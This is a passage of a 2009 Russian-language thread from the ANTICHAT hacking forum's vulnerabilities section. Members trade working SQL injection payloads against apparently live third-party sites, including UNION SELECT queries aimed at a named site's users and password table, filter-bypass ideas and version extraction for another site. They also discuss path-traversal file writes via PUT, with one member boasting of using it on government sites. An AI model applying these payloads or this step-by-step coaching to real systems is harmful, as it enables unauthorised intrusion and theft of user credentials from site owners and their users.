ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10291  
Старый 20.11.2009, 10:33
YuNi|[c
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
Провел на форуме:
556476

Репутация: 66
По умолчанию

есть ли у кого нибудь эксплойт на Microsoft .NET Framework Version:2.0.50727 Никак не могу найти
 
Ответить с цитированием

  #10292  
Старый 20.11.2009, 15:00
GenTao
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме:
143706

Репутация: -1
По умолчанию

Цитата:
Сообщение от p.r0phe.t  
Подскажите, сканер выплюнул:

С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
 
Ответить с цитированием

  #10293  
Старый 20.11.2009, 15:25
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
Провел на форуме:
224604

Репутация: 19
По умолчанию

Цитата:
Сообщение от GenTao  
Ты бы хоть нумеровал свои ошибки чтоли).а команда PUT тут имеется в виду Метод PUT протокола НТТР.Нарули в гугле синтаксис и лей,че хошь).На паре гов сайтов у мя давным-давно такое прокатило.Пробовал,правда, ить ток тхт файлы).Редкая довольно-таки вещь.
В сервисе TFTP на 69 udp порту.
Причём тут ХТТП? оО
Какие ошибки нумеровать? ты о чём?
 
Ответить с цитированием

  #10294  
Старый 20.11.2009, 16:40
Nosfer
Новичок
Регистрация: 10.01.2007
Сообщений: 16
Провел на форуме:
109680

Репутация: 2
По умолчанию

http://www.pngbd.com/photos/showgallery.php?cat=999%27%29+UNION+SELECT+1,passw ord,3,4+from+matryx_photos.users%23

видимо стоят фильтры на password,users итд есть идеи как обойти?
 
Ответить с цитированием

  #10295  
Старый 20.11.2009, 17:25
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020

Репутация: 1423
По умолчанию

Емпти сет. Эта табличка пустая

999')+UNION+SELECT+1,count(*),3,4+from+users--+

Кстати рега происходит в булке, а не в этом PhotoPost. Видимо база юзеров хранится там.
 
Ответить с цитированием

  #10296  
Старый 20.11.2009, 17:26
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

Цитата:
С помощью команды "PUT /../../../../roellibu.txt" существует возможность записывать любые файлы в произвольное место на диске.
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
 
Ответить с цитированием

  #10297  
Старый 20.11.2009, 17:40
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от Spyder  
Это дело будет работать если на сервере в конфиге апача для метода PUT прописан специальный cgi скрипт, который создает файлы
я думаю речь идет не про метод PUT, а про фтпшную комманду PUT и суть уязвимости в том, что с помощью ../../ можно выйти из родительского каталога и записать файл ну например в корень серва, если конечно права позволят, это мое предположение и я могу ошибаться
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10298  
Старый 20.11.2009, 17:55
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

ребята, после изучений нескольких статей, хотел пробовать в деле, и в одном сайте по запросу:
Код:
http://www.site.ru/vn84.php?id=’ OR ’1’=’1’
Выдает такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '™ OR ’1’=’1В’ AND status = '1'' at line 2
на сколько это серьезная ошибка и можно ли раскрутить это дальше ?

а если например перенаправить (http://www.site.ru/vn84.php?id=http://www.ya.ru/) на yandex.ru, то получается такая ошибка:
Код:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '://www.ya.ru/ AND status = '1'' at line 2
 
Ответить с цитированием

  #10299  
Старый 20.11.2009, 18:06
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

2B1t.exe
Код:
id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x27,version())+--+
мне кажется там можно замутить инклюд или читалку файлов
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #10300  
Старый 20.11.2009, 18:10
B1t.exe
Постоянный
Регистрация: 06.11.2006
Сообщений: 865
Провел на форуме:
1977708

Репутация: 208


По умолчанию

Scipio
угу. теперь вроде версия да появился ?
Код:
http://www.site.ru/vn84.php?id=id=-1 union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,  concat(0x27,version())+--+
выдает:
Код:
error:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '4.1.22'' at line 2
получется иммем MySQL версии 4.1.22 ?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ